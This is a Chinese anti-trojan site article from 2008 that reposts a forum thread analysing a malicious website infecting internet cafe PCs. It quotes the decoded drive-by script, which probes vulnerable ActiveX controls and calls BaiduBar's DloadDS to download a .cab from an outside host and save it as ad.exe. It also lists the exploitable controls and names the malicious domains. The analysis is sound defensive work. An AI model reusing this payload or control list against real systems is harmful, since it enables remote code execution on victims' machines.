载入中…

 | 网站首页 | 文章中心 | 下载中心 | 图片中心 | 反木马论坛 |日志分析|样本上传|求助| | 

您现在的位置: 反木马在线 >> 文章中心 >> 安全防护 >> 文章正文
木马的主要入侵途径--网页种马
作者:佚名    文章来源:不详    点击数:    更新时间:2008-6-26



安全提示: 请不要访问下面所提到的lidoo.net.cn的网站!


现在, 木马和病毒利用第三方软件漏洞侵入系统手段越来越频繁 - 只要你浏览恶意网站就很有可能中招, 而且恶意网也通过变换不同的域名网址来躲避搜索引擎和安全公司的评估. 所以, 当务之急, 用户需要作好足够的防御措施, 包括备份系统和重要资料, 安装杀毒软件和防火墙, 及时更新系统, 特别是有漏洞的第三方软件! 还有不要随便点别人发的联接和点击安全评估为恶意网站的联接.

以下是个利用第三方软件漏洞的例子:

laowang627说:

现在网吧又出现新木马。进程里出现好多cmd.exe和ftp.exe

中毒后网吧老掉线

还原没被穿透。重起一下没有了

我只知道不官打开什么游戏或网站有很少机率会弹出这个网站就中毒了。

网站地址:http://www.lidoo.net.cn/free.asp?uid=1

别的病毒网站不知道,我就见到这个网站有毒。

请360提取样本解决。谢谢!!



 

jiruixian说:

我要访问http://www.lidoo.net.cn/free.asp?uid=1这个网站的时候,被360阻止了,提示有病毒

360真不错



 

laowang627说:

网吧机器没有装360啊。

又不是家里机器



 

greedwind说:

请在路由器屏蔽 90356.com.cn

和261.cncz.us

应该不影响该网的浏览

后注:

我上去该网的时候, 便出现下面的提示(我用IE 7), 然后杀软和360不断提示.



 

greedwind说:

代码反译出来了, 是利用Microsoft很老的漏洞XMLHTTP和播放器的漏洞来下载和直接运行执行文件EXE的.

(后注: 原来的代码是16进制的, 当我后来访问该网的时候, 代码有所变动. 看以下代码, 普通JAVACRIPT的程序偏要写成吞吞吐吐, 而且用16进制简单\"加密\". 这是木马程序为了躲避杀软的追杀 - 稍微加点东西就好象不一样的代码了. 所以如果你的系统有漏洞, 单靠杀软来防御是远远不够的. 这也是上网浏览网页的时候会中木马病毒的最直接原因!)

?/*00000000000000000000000000000*/

try{if(new ActiveXObject(\"M\"+\"i\"+\"cro\"+\"so\"+\"ft.X\"+\"ML\"+\"H\"+\"TT\"+\"P\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"IE\"+\"RP\"+\"Ctl.IER\"+\"PC\"+\"tl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"M\"+\"PS.S\"+\"to\"+\"rm\"+\"Pl\"+\"ay\"+\"er\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"P\"+\"OW\"+\"ER\"+\"PLA\"+\"YE\"+\"R.Powe\"+\"rPlay\"+\"erC\"+\"trl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

/*00000000000000000000000000000*/

try{if(new ActiveXObject(\"GLCH\"+\"AT.GLCh\"+\"atCtrl.1\"))window[\"document\"][\"write\"](\'\')}catch(e){};

try{if(new ActiveXObject(\"DP\"+\"Cli\"+\"ent.V\"+\"od\"))window[\"document\"][\"write\"](\'\')}catch(e){};

/*00000000000000000000000000000*/

var obj=new ActiveXObject(\"B\"+\"a\"+\"id\"+\"u\"+\"B\"+\"a\"+\"r.T\"+\"o\"+\"o\"+\"l\");if(obj){obj.DloadDS(\"http://u.c\"+\"ncz.us/d/a\"+\"d.\"+\"c\"+\"ab\",\"ad.exe\",0)};

/*00000000000000000000000000000*/?



 

greedwind又说:

根据上面的代码, 可以很容易知道这些有问题的控件:

Microsoft.XMLHTTP 这个不用说了, 前面说过了, 微软的漏洞

IERPCtl.IERPCtl.1 realplayer的漏洞

MPS.StormPlayer 暴风影音的漏洞

POWERPLAYER.PowerPlayerCtrl.1 POWERPLAYER的漏洞

GLCHAT.GLChatCtrl.1 联众游戏聊天室组件漏洞洞

DPClient.Vod 迅雷漏洞

BaiduBar.Tool 百度超级搜霸漏洞

我xxx, 有些不出名的控件都找到漏洞了! 黑客就黑啊!怎么我就找不出这些漏洞啊!水平有限



 

jiruixian说:

为了将来安全起见,预防此类事件再次发生,建议安装360?



 

laowang627说:

谢谢。

黑客就是看准网吧机器没法打漏洞才有这样的代码?
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 相关新闻
    防范黑客入侵
    病毒木马拒之门外
    查找与清除线程插入式木马
    警惕广告木马:“网络小广告”
    两招轻松搞定顽固木马
    QQ盗号木马6995变种警惕
    黑客种植木马的新方法及相关防范策略
    查杀termsv.exe木马
    警惕!可恶的盗号木马又出新招!
    恶性U盘Bing Du的分析[8位变种]
    论坛新帖
    新 闻 TOP 10
  • 没有热点文章
  • 点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    点击申请点击申请点击申请点击申请点击申请点击申请点击申请点击申请
    文字链接: 热门下说网
    Copyright © 2008 FanMuMa.com All Rights Reserved
    客服邮箱:fanmuma#126.com(将#换为@) 站长:Fisco 联系电话:15802671439 联系QQ:337803 
    捍卫属于个人的一切--